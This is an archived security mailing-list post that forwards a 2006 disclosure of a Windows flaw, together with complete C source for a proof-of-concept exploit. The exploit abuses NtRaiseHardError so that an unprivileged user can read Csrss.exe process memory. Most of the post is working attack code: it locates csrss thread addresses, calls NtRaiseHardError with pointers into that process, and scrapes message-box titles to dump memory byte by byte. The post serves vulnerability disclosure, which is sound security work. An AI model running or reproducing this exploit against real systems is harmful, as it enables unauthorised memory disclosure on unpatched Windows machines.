Security-Alerts mailing list archive (security-alerts@yandex-team.ru)
[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[security-alerts] FW: NtRaiseHardError Csrss.exe memory Disclosure exploit
> -----Original Message-----
> From: Reversemode [mailto:advisories@xxxxxxxxxxxxxxx]
> Sent: Wednesday, December 27, 2006 11:12 PM
> To: Securityfocus
> Subject: NtRaiseHardError Csrss.exe memory Disclosure exploit
>
>
> Hi,
>
> I have been taking a look at the NtRaiseHardError bug and just for fun
> I've coded an exploit. Watch out, not for the double free
> vulnerability
> (indeed I have not analyzed that piece of code yet) but just
> relying on
> NtRaiseHardError internals and how is dispatched a MessageBox with
> MB_SERVICE_NOTIFICATION parameter enabled...
>
> In google groups there are old references for this bug as a
> DoS.Unprivileged users can exploit that bug in order to read Csrss.exe
> process memory though.
> Not a big deal, but curious at least.
>
> Tested on XP SP2 and 2K SP4 fully patched.
>
> cheers,
> Rub?n.
>
> ----------------------------------------------
> Direct download
>
> mid=2&func=fileinfo&id=43
>
> /////////////////////////////////////////
> /////////////////////////////////////////
> ///// Microsoft Windows NtRaiseHardError
> ///// Csrss.exe memory disclosure
> /////////////////////////////////////////
> ///// Ruben Santamarta
> ///// ruben at reversemode dot com
> ///// www.reversemode.com
> /////////////////////////////////////////
> ///// 12.27.2006
> ///// For educational purposes ONLY
> ///// Compiled using gcc (Dev-C++)
> ////////////////////////////////////////
>
> #include <stdio.h>
> #include <windows.h>
> #include <winbase.h>
> #include <ntsecapi.h>
>
>
> #define UNICODE
> #define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0)
> #define STATUS_SUCCESS ((NTSTATUS) 0x00000000)
> #define STATUS_INFO_LENGTH_MISMATCH ((NTSTATUS) 0xC0000004)
> #define STATUS_INVALID_PARAMETER ((NTSTATUS) 0xC000000D)
> #define SystemProcessesAndThreadsInformation 5
> #define NTAPI __stdcall
>
> int gLen=1;
>
>
> typedef NTSTATUS (WINAPI *PNTRAISE)(NTSTATUS,
> ULONG,
> ULONG,
> PULONG,
> UINT,
> PULONG);
>
>
> typedef LONG NTSTATUS;
> typedef LONG KPRIORITY;
>
> typedef struct _CLIENT_ID {
> DWORD UniqueProcess;
> DWORD UniqueThread;
> } CLIENT_ID, * PCLIENT_ID;
>
>
> typedef struct _VM_COUNTERS {
> SIZE_T PeakVirtualSize;
> SIZE_T VirtualSize;
> ULONG PageFaultCount;
> SIZE_T PeakWorkingSetSize;
> SIZE_T WorkingSetSize;
> SIZE_T QuotaPeakPagedPoolUsage;
> SIZE_T QuotaPagedPoolUsage;
> SIZE_T QuotaPeakNonPagedPoolUsage;
> SIZE_T QuotaNonPagedPoolUsage;
> SIZE_T PagefileUsage;
> SIZE_T PeakPagefileUsage;
> } VM_COUNTERS;
>
>
> typedef struct _SYSTEM_THREAD_INFORMATION {
> LARGE_INTEGER KernelTime;
> LARGE_INTEGER UserTime;
> LARGE_INTEGER CreateTime;
> ULONG WaitTime;
> PVOID StartAddress;
> CLIENT_ID ClientId;
> KPRIORITY Priority;
> KPRIORITY BasePriority;
> ULONG ContextSwitchCount;
> LONG State;
> LONG WaitReason;
> } SYSTEM_THREAD_INFORMATION, * PSYSTEM_THREAD_INFORMATION;
>
>
>
> typedef struct _SYSTEM_PROCESS_INFORMATION {
> ULONG NextEntryDelta;
> ULONG ThreadCount;
> ULONG Reserved1[6];
> LARGE_INTEGER CreateTime;
> LARGE_INTEGER UserTime;
> LARGE_INTEGER KernelTime;
> UNICODE_STRING ProcessName;
> KPRIORITY BasePriority;
> ULONG ProcessId;
> ULONG InheritedFromProcessId;
> ULONG HandleCount;
> ULONG Reserved2[2];
> VM_COUNTERS VmCounters;
> IO_COUNTERS IoCounters;
> SYSTEM_THREAD_INFORMATION Threads[5];
> } SYSTEM_PROCESS_INFORMATION, * PSYSTEM_PROCESS_INFORMATION;
>
>
>
> typedef DWORD (WINAPI* PQUERYSYSTEM)(UINT, PVOID, DWORD,PDWORD);
>
>
> ULONG GetCsrssThread()
> {
> ULONG cbBuffer = 0x5000;
> ULONG tPointer;
> LPVOID pBuffer = NULL;
> NTSTATUS Status;
> PCWSTR pszProcessName;
> DWORD junk;
> ULONG ThreadCount;
> int i=0,b=0;
>
> PQUERYSYSTEM NtQuerySystemInformation;
> PSYSTEM_THREAD_INFORMATION pThreads;
> PSYSTEM_PROCESS_INFORMATION pInfo ;
>
> NtQuerySystemInformation = (PQUERYSYSTEM)
> GetProcAddress( LoadLibrary(
> "ntdll.dll" ),
>
> "NtQuerySystemInformation" );
>
>
> do
> {
> pBuffer = malloc(cbBuffer);
> if (pBuffer == NULL)
> {
> printf(("Not enough memory\n"));
> break;
> }
>
> Status = NtQuerySystemInformation(
> SystemProcessesAndThreadsInformation,
> pBuffer, cbBuffer, NULL);
>
> if (Status == STATUS_INFO_LENGTH_MISMATCH)
> {
> free(pBuffer);
> cbBuffer *= 2;
> }
> else if (!NT_SUCCESS(Status))
> {
> printf("NtQuerySystemInformation Error! ");
> free(pBuffer);
> }
>
> } while (Status == STATUS_INFO_LENGTH_MISMATCH);
>
>
> pInfo = (PSYSTEM_PROCESS_INFORMATION)pBuffer;
>
> for (;;)
> {
>
>
> if (pInfo->NextEntryDelta == 0)
> break;
> if(pInfo->ProcessName.Buffer!=NULL &&
> !wcsicmp(pInfo->ProcessName.Buffer,L"csrss.exe"))
> {
>
> printf("\n[%ws] \n\n",
> pInfo->ProcessName.Buffer);
> printf("5 addresses for testing purposes\n\n");
> for(b=0;b<5;b++)
> {
> printf("Thread %d ->
> 0x%x\n",b,pInfo->Threads[b].StartAddress);
> }
> tPointer=(ULONG)pInfo->Threads[1].StartAddress;
> }
> pInfo = (PSYSTEM_PROCESS_INFORMATION)(((PUCHAR)pInfo)
> +
> pInfo->NextEntryDelta);
> }
>
> free(pBuffer);
> return tPointer;
> }
>
> VOID WINAPI ReadBox( LPVOID param )
> {
>
> HWND hWindow,hButton,hText;
> int i=0,b=0;
> int gTemp;
> char lpTitle[300];
> char lpText[300];
> char lpBuff[500];
>
> for (;;)
> {
>
> lpText[0]=(BYTE)"";
> Sleep(800);
> hWindow = FindWindow("#32770",NULL);
> if(hWindow != NULL)
> {
> GetWindowText(hWindow,(LPSTR)&lpTitle,250);
>
> hText=FindWindowEx(hWindow,0,"static",0);
>
> GetWindowText(hText,(LPSTR)&lpText,250);
> hText=GetNextWindow(hText,GW_HWNDNEXT);
>
> GetWindowText(hText,(LPSTR)&lpText,250);
> gTemp = strlen(lpTitle);
>
> if ( gTemp>1 ) gLen = gTemp;
> else gLen = 1;
>
> for(i = 0; i < gTemp; i++)
> printf("%.2X",(BYTE)lpTitle[i]);
>
>
> SendMessage(hWindow,WM_CLOSE,0,0);
>
> ZeroMemory((LPVOID)lpTitle,250);
> ZeroMemory((LPVOID)lpText,250);
> ZeroMemory((LPVOID)lpBuff,300);
> }
>
> }
> }
>
>
>
>
> int main()
> {
>
> UNICODE_STRING uStr={5,5,L"fun!"};
> ULONG retValue,args[]={0,0,&uStr};
> ULONG csAddr;
> PNTRAISE NtRaiseHardError;
> int i=0;
>
> system("cls");
> printf("##########################################\n");
> printf("### Microsoft Windows NtRaiseHardError ###\n");
> printf("##### Csrss.exe memory disclosure ######\n");
> printf("@@@@@ Xmas Exploit - ho ho ho! @@@@@@\n");
> printf("## Ruben Santamarta www.reversemode.com ##\n");
> printf("##########################################\n\n");
>
>
> NtRaiseHardError=(PNTRAISE)GetProcAddress(GetModuleHandle("ntd
> ll.dll"),
> "NtRaiseHardError");
>
> csAddr=GetCsrssThread();
>
> args[0]=csAddr;
> args[1]=csAddr;
> printf("\n[+] Capturing Messages \n");
>
> CreateThread( NULL,
> 0,
> (LPTHREAD_START_ROUTINE)ReadBox,
> 0,
> 0,
> NULL);
>
>
>
> printf("\n[+] Now reading at: [0x%p] - Thread
> 1\n\n",csAddr);
>
> for(;;)
> {
> printf("Reading bytes at [0x%p] : ",args[0]);
> NtRaiseHardError(0x50000018,3,4,args,1,&retValue);
>
> if(retValue && gLen<=1) printf("00\n");
> else printf("\n");
>
> args[0]+=gLen;
> args[1]+=gLen;
> }
> }
>
>
|
